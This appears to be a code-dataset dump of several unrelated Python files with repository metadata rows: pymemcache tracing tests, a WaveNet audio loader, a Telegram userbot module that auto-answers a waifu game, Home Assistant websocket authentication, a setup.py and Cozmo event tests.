self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["append key"])
def test_prepend_stored(self):
client = self.make_client([b"STORED\r\n"])
result = client.prepend(b"key", b"value", noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["prepend key"])
def test_cas_stored(self):
client = self.make_client([b"STORED\r\n"])
result = client.cas(b"key", b"value", b"cas", noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["cas key"])
def test_cas_exists(self):
client = self.make_client([b"EXISTS\r\n"])
result = client.cas(b"key", b"value", b"cas", noreply=False)
assert result is False
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["cas key"])
def test_cas_not_found(self):
client = self.make_client([b"NOT_FOUND\r\n"])
result = client.cas(b"key", b"value", b"cas", noreply=False)
assert result is None
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["cas key"])
def test_delete_exception(self):
client = self.make_client([Exception("fail")])
def _delete():
client.delete(b"key", noreply=False)
with self.assertRaises(Exception):
_delete()
spans = self.memory_exporter.get_finished_spans()
span = spans[0]
self.assertNotEqual(span.status.canonical_code, StatusCanonicalCode.OK)
self.check_spans(spans, 1, ["delete key"])
def test_flush_all(self):
client = self.make_client([b"OK\r\n"])
result = client.flush_all(noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["flush_all"])
def test_incr_exception(self):
client = self.make_client([Exception("fail")])
def _incr():
client.incr(b"key", 1)
with self.assertRaises(Exception):
_incr()
spans = self.memory_exporter.get_finished_spans()
span = spans[0]
self.assertNotEqual(span.status.canonical_code, StatusCanonicalCode.OK)
self.check_spans(spans, 1, ["incr key"])
def test_get_error(self):
client = self.make_client([b"ERROR\r\n"])
def _get():
client.get(b"key")
with self.assertRaises(MemcacheUnknownCommandError):
_get()
spans = self.memory_exporter.get_finished_spans()
span = spans[0]
self.assertNotEqual(span.status.canonical_code, StatusCanonicalCode.OK)
self.check_spans(spans, 1, ["get key"])
def test_get_unknown_error(self):
client = self.make_client([b"foobarbaz\r\n"])
def _get():
client.get(b"key")
with self.assertRaises(MemcacheUnknownError):
_get()
spans = self.memory_exporter.get_finished_spans()
span = spans[0]
self.assertNotEqual(span.status.canonical_code, StatusCanonicalCode.OK)
self.check_spans(spans, 1, ["get key"])
def test_gets_found(self):
client = self.make_client([b"VALUE key 0 5 10\r\nvalue\r\nEND\r\n"])
result = client.gets(b"key")
assert result == (b"value", b"10")
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["gets key"])
def test_touch_not_found(self):
client = self.make_client([b"NOT_FOUND\r\n"])
result = client.touch(b"key", noreply=False)
assert result is False
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["touch key"])
def test_set_client_error(self):
client = self.make_client([b"CLIENT_ERROR some message\r\n"])
def _set():
client.set("key", "value", noreply=False)
with self.assertRaises(MemcacheClientError):
_set()
spans = self.memory_exporter.get_finished_spans()
span = spans[0]
self.assertNotEqual(span.status.canonical_code, StatusCanonicalCode.OK)
self.check_spans(spans, 1, ["set key"])
def test_set_server_error(self):
client = self.make_client([b"SERVER_ERROR some message\r\n"])
def _set():
client.set(b"key", b"value", noreply=False)
with self.assertRaises(MemcacheServerError):
_set()
spans = self.memory_exporter.get_finished_spans()
span = spans[0]
self.assertNotEqual(span.status.canonical_code, StatusCanonicalCode.OK)
self.check_spans(spans, 1, ["set key"])
def test_set_key_with_space(self):
client = self.make_client([b""])
def _set():
client.set(b"key has space", b"value", noreply=False)
with self.assertRaises(MemcacheIllegalInputError):
_set()
spans = self.memory_exporter.get_finished_spans()
span = spans[0]
self.assertNotEqual(span.status.canonical_code, StatusCanonicalCode.OK)
self.check_spans(spans, 1, ["set key has space"])
def test_quit(self):
client = self.make_client([])
assert client.quit() is None
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["quit"])
def test_replace_not_stored(self):
client = self.make_client([b"NOT_STORED\r\n"])
result = client.replace(b"key", b"value", noreply=False)
assert result is False
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["replace key"])
def test_version_success(self):
client = self.make_client(
[b"VERSION 1.2.3\r\n"], default_noreply=False
)
result = client.version()
assert result == b"1.2.3"
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["version"])
def test_stats(self):
client = self.make_client([b"STAT fake_stats 1\r\n", b"END\r\n"])
result = client.stats()
assert client.sock.send_bufs == [b"stats \r\n"]
assert result == {b"fake_stats": 1}
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 1, ["stats"])
def test_uninstrumented(self):
PymemcacheInstrumentor().uninstrument()
client = self.make_client(
[b"STORED\r\n", b"VALUE key 0 5\r\nvalue\r\nEND\r\n"]
)
client.set(b"key", b"value", noreply=False)
result = client.get(b"key")
assert _str(result) == "value"
spans = self.memory_exporter.get_finished_spans()
self.assertEqual(len(spans), 0)
PymemcacheInstrumentor().instrument()
class PymemcacheHashClientTestCase(TestBase):
""" Tests for a patched pymemcache.client.hash.HashClient. """
def setUp(self):
super().setUp()
PymemcacheInstrumentor().instrument()
# pylint: disable=protected-access
self.tracer = get_tracer(__name__)
def tearDown(self):
super().tearDown()
PymemcacheInstrumentor().uninstrument()
def make_client_pool(
self, hostname, mock_socket_values, serializer=None, **kwargs
): # pylint: disable=no-self-use
mock_client = pymemcache.client.base.Client(
hostname, serializer=serializer, **kwargs
)
mock_client.sock = MockSocket(mock_socket_values)
client = pymemcache.client.base.PooledClient(
hostname, serializer=serializer
)
client.client_pool = pymemcache.pool.ObjectPool(lambda: mock_client)
return mock_client
def make_client(self, *mock_socket_values, **kwargs):
current_port = TEST_PORT
# pylint: disable=import-outside-toplevel
from pymemcache.client.hash import HashClient
# pylint: disable=attribute-defined-outside-init
self.client = HashClient([], **kwargs)
ip = TEST_HOST
for vals in mock_socket_values:
url_string = "{}:{}".format(ip, current_port)
clnt_pool = self.make_client_pool(
(ip, current_port), vals, **kwargs
)
self.client.clients[url_string] = clnt_pool
self.client.hasher.add_node(url_string)
current_port += 1
return self.client
def check_spans(self, spans, num_expected, queries_expected):
"""A helper for validating basic span information."""
self.assertEqual(num_expected, len(spans))
for span, query in zip(spans, queries_expected):
self.assertEqual(span.name, "memcached.command")
self.assertIs(span.kind, trace_api.SpanKind.INTERNAL)
self.assertEqual(
span.attributes["net.peer.name"], "{}".format(TEST_HOST)
)
self.assertEqual(span.attributes["net.peer.port"], TEST_PORT)
self.assertEqual(span.attributes["db.type"], "memcached")
self.assertEqual(
span.attributes["db.url"],
"memcached://{}:{}".format(TEST_HOST, TEST_PORT),
)
self.assertEqual(span.attributes["db.statement"], query)
def test_delete_many_found(self):
client = self.make_client([b"STORED\r", b"\n", b"DELETED\r\n"])
result = client.add(b"key", b"value", noreply=False)
result = client.delete_many([b"key"], noreply=False)
self.assertTrue(result)
spans = self.memory_exporter.get_finished_spans()
self.check_spans(spans, 2, ["add key", "delete key"])
| 32.394286
| 81
| 0.632151
|
794dab153991a79fcc034623a437748f75fc1d04
| 4,621
|
py
|
Python
|
wavenet/data.py
|
wusq121/wavenet
|
98e9328292f5d5a72355027f88867e12d121d43f
|
[
"MIT"
] | 2
|
2019-09-10T08:51:30.000Z
|
2021-06-02T05:57:56.000Z
|
wavenet/data.py
|
wusq121/wavenet
|
98e9328292f5d5a72355027f88867e12d121d43f
|
[
"MIT"
] | null | null | null |
wavenet/data.py
|
wusq121/wavenet
|
98e9328292f5d5a72355027f88867e12d121d43f
|
[
"MIT"
] | null | null | null |
"""
data load and preprocess
"""
import os
import librosa
import numpy as np
import torch
import torch.utils.data as data
def load_audio(filename, sample_rate=22500, trim=True, trim_frame_length=2048):
audio, _ = librosa.load(filename, sr=sample_rate, mono=True)
audio = audio.reshape(-1, 1)
if trim:
audio._ = librosa.effects.trim(audio, frame_length=trim_frame_length)
return audio
def one_hot_encode(data, channels=256):
"""
the return of this function is a numpy array shaped as [C(channels), L(timestep)]
"""
one_hot = np.zeros((channels, data.size), dtype=float)
one_hot[data.ravel(), np.arange(data.size)] = 1
return one_hot
def one_hot_decode(data, axis=0):
decoded = np.argmax(data, axis=axis)
return decoded
def quantize_encode(audio, quantization=256):
mu = float(quantization - 1)
quantization_space = np.linspace(-1, 1, quantization)
quantized = np.sign(audio) * np.log(1 + mu * np.abs(audio)) / np.log(mu +
1)
quantized = np.digitize(quantized, quantization_space) - 1
return quantized
def quantize_decode(quantized, quantization=256):
mu = float(quantization - 1)
expand = (quantized / quantization) * 2.0 - 1
waveform = np.sign(expand) * (np.exp(np.abs(expand) * np.log(1 + mu)) -
1) / mu
return waveform
class Audioset(data.Dataset):
"""
When get an item in the dataset, the audio is shaped as [C(channel), L(timestep)]
"""
def __init__(self, data_dir, sample_rate=22500, in_channels=256,
trim=True):
super(Audioset, self).__init__()
self.in_channels = in_channels
self.sample_rate = sample_rate
self.trim = trim
self.root_path = data_dir
self.filename = [x for x in sorted(os.listdir(data_dir))]
def __getitem__(self, index):
filepath = os.path.join(self.root_path, self.filename[index])
raw_audio = load_audio(filepath, self.sample_rate, self.trim)
encode = one_hot_encode(quantize_encode(raw_audio, self.in_channels),
self.in_channels)
return encode
def __len__(self):
return len(self.filename)
class DataLoader(data.DataLoader):
def __init__(self,
data_dir,
receptive_fields,
sample_size=0,
sample_rate=22500,
in_channels=256,
batch_size=1,
shuffle=True):
"""
DataLoader for Network
:param data_dir: directory of data
:param receptive_fields: size of receptive fields.
:param sample_size: number of timesteps to train at once. sample size has to be bigger than receptive fields.
:param sample_rate: sound sampling rate
:param in_channels: number of input channels
:param batch_size:
:param shuffle:
"""
dataset = Audioset(data_dir, sample_size, in_channels)
super(DataLoader, self).__init__(dataset, batch_size, shuffle)
if sample_rate <= receptive_fields:
raise Exception(
"sample_size has to be bigger than receptive_fields")
self.sample_size = sample_size
self.receptive_fields = receptive_fields
self.collate_fn = self._collate_fn
def calc_sample_size(self, audio):
return self.sample_size if len(audio[0]) >= self.sample_size else len(
audio[0])
@staticmethod
def _variable(data):
tensor = torch.from_numpy(data).float()
if torch.cuda.is_available():
return torch.autograd.Variable(tensor.cuda())
else:
return torch.autograd.Variable(tensor)
def _collate_fn(self, audio):
audio = np.pad(audio, [[0, 0], [self.receptive_fields, 0], [0, 0]], 'constant')
if self.sample_size:
sample_size = self.calc_sample_size(audio)
while sample_size > self.receptive_fields:
inputs = audio[:, :sample_size, :]
targets = audio[:, self.receptive_fields, :]
yield self._variable(inputs), self._variable(one_hot_decode(targets, 2))
audio = audio[:, sample_size - self.receptive_fields:, :]
sample_size = self.calc_sample_size(audio)
else:
targets = audio[:, self.receptive_field:, :]
return self._variable(audio), self._variable(one_hot_decode(targets, 2))
| 31.435374
| 117
| 0.608959
|
794dadd70198c482fd1abeae3d70e21cfde31e6b
| 11,375
|
py
|
Python
|
ub/modules/ShivamCredits.py
|
parv779/javes-3.0
|
d510717b2756a65b39ff18d9f53d4adc46d8e23f
|
[
"MIT"
] | 15
|
2020-12-13T17:37:05.000Z
|
2021-06-23T00:00:49.000Z
|
ub/modules/ShivamCredits.py
|
parv779/javes-3.0
|
d510717b2756a65b39ff18d9f53d4adc46d8e23f
|
[
"MIT"
] | 2
|
2021-01-11T16:39:31.000Z
|
2021-01-25T22:35:28.000Z
|
ub/modules/ShivamCredits.py
|
parv779/javes-3.0
|
d510717b2756a65b39ff18d9f53d4adc46d8e23f
|
[
"MIT"
] | 78
|
2020-12-13T17:52:51.000Z
|
2022-03-24T03:43:09.000Z
|
from ub.events import javes05
from ub import CMD_HELP, bot as javes, LOGS, JAVES_NAME
from ub.javes_main.commands import rekcah05
from telethon.events import ChatAction
#made by shivam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
from ub import bot as javes, CMD_HELP
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
from ub import TEMP_DOWNLOAD_DIRECTORY
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
import os,re, bs4, requests, io
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Shivam#Made#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
from telethon import events
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
from pathlib import Path
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Sh1vam
from os import remove
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
from bs4 import BeautifulSoup
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
from re import findall
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
from urllib.parse import quote_plus
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
from requests import get
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
#Made by Sh1vam
#Made by Sh1vam#Made by Sh1vam#Made#Made by Sh1vam#Made by Sh1vam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
from PIL import Image
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
from telethon.tl.types import MessageMediaPhoto
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
import urllib
from ub import bot as borg
import os
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
from bs4 import BeautifulSoup
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
opener = urllib.request.build_opener() ; useragent = 'Mozilla/5.0 (Linux; Android 9; SM-G960F Build/PPR1.180610.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.70 Mobile Safari/537.36' ; opener.addheaders = [('User-agent', useragent)]
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
JAVES_NNAME = str(JAVES_NAME) if JAVES_NAME else str(JAVES_MSG)
WAFU_CHATID=int(os.environ.get("WAFU_CHATID",-1001230114424))
async def ParseSauce(googleurl):
source = opener.open(googleurl).read()
soup = BeautifulSoup(source, 'html.parser')
results = {'similar_images': '', 'best_guess': ''}
try:
for similar_image in soup.findAll('input', {'class': 'gLFyf'}):
url = 'https://www.google.com/search?tbm=isch&q=' + \
urllib.parse.quote_plus(similar_image.get('value'))
results['similar_images'] = url
except BaseException:
pass
for best_guess in soup.findAll('div', attrs={'class': 'r5a77d'}):
results['best_guess'] = best_guess.get_text()
return results
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
async def scam(results, lim):
single = opener.open(results['similar_images']).read()
decoded = single.decode('utf-8')
imglinks = []
counter = 0
pattern = r'^,\[\"(.*[!png|!jpg|!jpeg])\",[0-9]+,[0-9]+\]$'
oboi = re.findall(pattern, decoded, re.I | re.M)
for imglink in oboi:
counter += 1
if not counter >= int(lim):
imglinks.append(imglink)
else:
break
return imglinks
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
async def chrome(chrome_options=None):
if chrome_options is None:
chrome_options = await options()
if not os.path.isdir(TEMP_DOWNLOAD_DIRECTORY):
os.mkdir(TEMP_DOWNLOAD_DIRECTORY)
prefs = {'download.default_directory': TEMP_DOWNLOAD_DIRECTORY}
chrome_options.add_experimental_option('prefs', prefs)
driver = webdriver.Chrome(executable_path=CHROME_DRIVER,
options=chrome_options)
return driver
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
#Made by Shivam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam
@javes.on(events.NewMessage(incoming=True))
async def on_new_message(event):
name = event.raw_text
snip = """appeared!
Add them to your harem by sending /protecc character name"""
pattern = r"( |^|[^\w])" + re.escape(snip) + r"( |$|[^\w])"
if re.search(pattern, name, flags=re.IGNORECASE):
try:
photo = io.BytesIO()
await event.client.download_media(event.media, photo)
image = Image.open(photo)
name = "okgoogle.png"
image.save(name, "PNG")
image.close()
searchUrl = 'https://www.google.com/searchbyimage/upload'
multipart = {
'encoded_image': (name, open(name, 'rb')),
'image_content': ''
}
response = requests.post(searchUrl,
files=multipart,
allow_redirects=False)
fetchUrl = response.headers['Location']
match = await ParseSauce(fetchUrl +"&preferences?hl=en&fg=1#languages")
guess = match['best_guess']
guesss = guess[12:]
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
try:
from ub.modules.sql_helper.autowafu_sql import get_current_wafu_settings
from ub.modules.sql_helper.autowafu_sql import update_previous_wafu
except AttributeError:
return
cws = get_current_wafu_settings(event.chat_id)
if cws:
await event.reply( f"/protecc {guesss}")
else:
await borg.send_message( WAFU_CHATID,f"/protecc {guesss}")
except Exception as e:
pass
#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made by Sh1vam#Made#Made by Shivam
#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam#Made by Shivam
'''@javes.on(ChatAction)
async def wafu_to_chat(event):
try:
from ub.modules.sql_helper.autowafu_sql import get_current_wafu_settings
from ub.modules.sql_helper.autowafu_sql import update_previous_wafu
except AttributeError:
return
cws = get_current_wafu_settings(event.chat_id)
if cws:'''
@javes05(outgoing=True, pattern=r"^!savewafu(?: |$)(.*)")
async def save_wafu(event):
try:
from ub.modules.sql_helper.autowafu_sql import add_wafu_setting
except AttributeError:
return await event.edit("`Running on Non-SQL mode!`")
string = """appeared!
Add them to your harem by sending /protecc character name"""
msg_id = None
if add_wafu_setting(event.chat_id, 0,string, msg_id) is True:
await event.edit('Auto wafu mode on')
else:
await event.edit(f"`{JAVES_NNAME}`: **auto wafu already present**")
@javes05(outgoing=True, pattern="^!checkwafu$")
async def show_wafu(event):
try:
from ub.modules.sql_helper.autowafu_sql import get_current_wafu_settings
except AttributeError:
await event.edit("`Running on Non-SQL mode!`")
return
cws = get_current_wafu_settings(event.chat_id)
if not cws:
await event.edit(f"`{JAVES_NNAME}`: **auto wafu not on.**")
return
else:
await event.edit(f"`{JAVES_NNAME}`: **auto wafu on.**")
@javes05(outgoing=True, pattern="^!clearwafu$")
async def del_wafu(event):
try:
from ub.modules.sql_helper.autowafu_sql import rm_wafu_setting
except AttributeError:
await event.edit("`Running on Non-SQL mode!`")
return
if rm_wafu_setting(event.chat_id) is True:
await event.edit(f"`{JAVES_NNAME}`: **auto wafu stops**")
else:
await event.edit(f"`{JAVES_NNAME}`: ** no auto wafu on. **")
| 48.404255
| 360
| 0.679121
|
794dae771531eaa01af409cebec126950c94cec8
| 3,623
|
py
|
Python
|
homeassistant/components/websocket_api/auth.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 22,481
|
2020-03-02T13:09:59.000Z
|
2022-03-31T23:34:28.000Z
|
homeassistant/components/websocket_api/auth.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 31,101
|
2020-03-02T13:00:16.000Z
|
2022-03-31T23:57:36.000Z
|
homeassistant/components/websocket_api/auth.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 11,411
|
2020-03-02T14:19:20.000Z
|
2022-03-31T22:46:07.000Z
|
"""Handle the auth of a connection."""
from __future__ import annotations
from collections.abc import Callable
from typing import TYPE_CHECKING, Any, Final
from aiohttp.web import Request
import voluptuous as vol
from voluptuous.humanize import humanize_error
from homeassistant.auth.models import RefreshToken, User
from homeassistant.components.http.ban import process_success_login, process_wrong_login
from homeassistant.const import __version__
from homeassistant.core import CALLBACK_TYPE, HomeAssistant
from .connection import ActiveConnection
from .error import Disconnect
if TYPE_CHECKING:
from .http import WebSocketAdapter
TYPE_AUTH: Final = "auth"
TYPE_AUTH_INVALID: Final = "auth_invalid"
TYPE_AUTH_OK: Final = "auth_ok"
TYPE_AUTH_REQUIRED: Final = "auth_required"
AUTH_MESSAGE_SCHEMA: Final = vol.Schema(
{
vol.Required("type"): TYPE_AUTH,
vol.Exclusive("api_password", "auth"): str,
vol.Exclusive("access_token", "auth"): str,
}
)
def auth_ok_message() -> dict[str, str]:
"""Return an auth_ok message."""
return {"type": TYPE_AUTH_OK, "ha_version": __version__}
def auth_required_message() -> dict[str, str]:
"""Return an auth_required message."""
return {"type": TYPE_AUTH_REQUIRED, "ha_version": __version__}
def auth_invalid_message(message: str) -> dict[str, str]:
"""Return an auth_invalid message."""
return {"type": TYPE_AUTH_INVALID, "message": message}
class AuthPhase:
"""Connection that requires client to authenticate first."""
def __init__(
self,
logger: WebSocketAdapter,
hass: HomeAssistant,
send_message: Callable[[str | dict[str, Any]], None],
cancel_ws: CALLBACK_TYPE,
request: Request,
) -> None:
"""Initialize the authentiated connection."""
self._hass = hass
self._send_message = send_message
self._cancel_ws = cancel_ws
self._logger = logger
self._request = request
async def async_handle(self, msg: dict[str, str]) -> ActiveConnection:
"""Handle authentication."""
try:
msg = AUTH_MESSAGE_SCHEMA(msg)
except vol.Invalid as err:
error_msg = (
f"Auth message incorrectly formatted: {humanize_error(msg, err)}"
)
self._logger.warning(error_msg)
self._send_message(auth_invalid_message(error_msg))
raise Disconnect from err
if "access_token" in msg:
self._logger.debug("Received access_token")
refresh_token = await self._hass.auth.async_validate_access_token(
msg["access_token"]
)
if refresh_token is not None:
conn = await self._async_finish_auth(refresh_token.user, refresh_token)
conn.subscriptions[
"auth"
] = self._hass.auth.async_register_revoke_token_callback(
refresh_token.id, self._cancel_ws
)
return conn
self._send_message(auth_invalid_message("Invalid access token or password"))
await process_wrong_login(self._request)
raise Disconnect
async def _async_finish_auth(
self, user: User, refresh_token: RefreshToken
) -> ActiveConnection:
"""Create an active connection."""
self._logger.debug("Auth OK")
await process_success_login(self._request)
self._send_message(auth_ok_message())
return ActiveConnection(
self._logger, self._hass, self._send_message, user, refresh_token
)
| 32.63964
| 88
| 0.663539
|
794db01e747f6fd6852026d3623061c0f8c6d699
| 1,498
|
py
|
Python
|
setup.py
|
mickstevens/plushcap
|
0602a69b950b49f17451684e2ebd355652beeb7e
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
mickstevens/plushcap
|
0602a69b950b49f17451684e2ebd355652beeb7e
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
mickstevens/plushcap
|
0602a69b950b49f17451684e2ebd355652beeb7e
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
readme = open('README.rst').read()
history = open('HISTORY.rst').read().replace('.. :changelog:', '')
requirements = [
# TODO: put package requirements here
]
test_requirements = [
# TODO: put package test requirements here
]
setup(
name='pisco-sour',
version='0.1.0',
description='Plushcap monitors websites and alerts people via text or phone call if there is a problem.',
long_description=readme + '\n\n' + history,
author='Mick Stevens',
author_email='mickstevens@yahoo.com',
url='https://github.com/mickstevens/plushcap',
packages=[
'plushcap',
],
package_dir={'plushcap':
'plushcap'},
include_package_data=True,
install_requires=requirements,
license="BSD",
zip_safe=False,
keywords='plushcap',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
test_suite='tests',
tests_require=test_requirements
)
| 27.236364
| 109
| 0.624166
|
794db02f372050109bf10f602052ebdefa376743
| 26,347
|
py
|
Python
|
tests/test_event.py
|
rootless4real/cozmo-python-sdk
|
dd29edef18748fcd816550469195323842a7872e
|
[
"Apache-2.0"
] | 794
|
2016-10-14T16:56:34.000Z
|
2022-03-31T16:21:21.000Z
|
tests/test_event.py
|
rootless4real/cozmo-python-sdk
|
dd29edef18748fcd816550469195323842a7872e
|
[
"Apache-2.0"
] | 63
|
2016-10-16T21:16:32.000Z
|
2021-12-25T06:01:36.000Z
|
tests/test_event.py
|
rootless4real/cozmo-python-sdk
|
dd29edef18748fcd816550469195323842a7872e
|
[
"Apache-2.0"
] | 485
|
2016-10-14T19:49:43.000Z
|
2022-03-29T17:30:09.000Z
|
# Copyright (c) 2016 Anki, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import asyncio
from asyncio import test_utils
from cozmo import event
from cozmo import exceptions
class DispatchTest(event.Dispatcher):
pass
class EventReceiver(event.Dispatcher):
_result_evt_one = None
_result_evt_one_internal = None
_result_evt_two = None
_result_evt_internal = None
_result_evt_child1 = None
def recv_evt_one(self, evt, **kw):
self._result_evt_one = evt
def _recv_evt_one(self, evt, **kw):
self._result_evt_one_internal = evt
async def recv_evt_two(self, evt, param1=False, **kw):
self._result_evt_two = evt
if param1:
raise exceptions.StopPropogation
def _recv_evt_child1(self, evt, **kw):
self._result_evt_child1 = evt
def recv_default_handler(self, evt, **kw):
self._result_default_handler = evt
def _recv_default_handler(self, evt, **kw):
self._result_default_handler_internal = evt
def _recv_evt_internal(self, evt, **kw):
self._result_evt_internal = evt
def named_handler(self, evt, param1=False, **kw):
self._result_named_handler = evt
if param1:
raise exceptions.StopPropogation
class EventTests(test_utils.TestCase):
def setUp(self):
self.loop = self.new_test_loop()
self.addCleanup(self.loop.close)
event.registered_events = {}
self._register_events()
def _register_events(self):
class EvtOne(event.Event):
"Test event"
param1 = "Parameter one"
param2 = "Parameter two"
param3 = "Parameter three"
class EvtTwo(event.Event):
"Test event"
param1 = "Parameter one"
param2 = "Parameter two"
class _EvtInternal(event.Event):
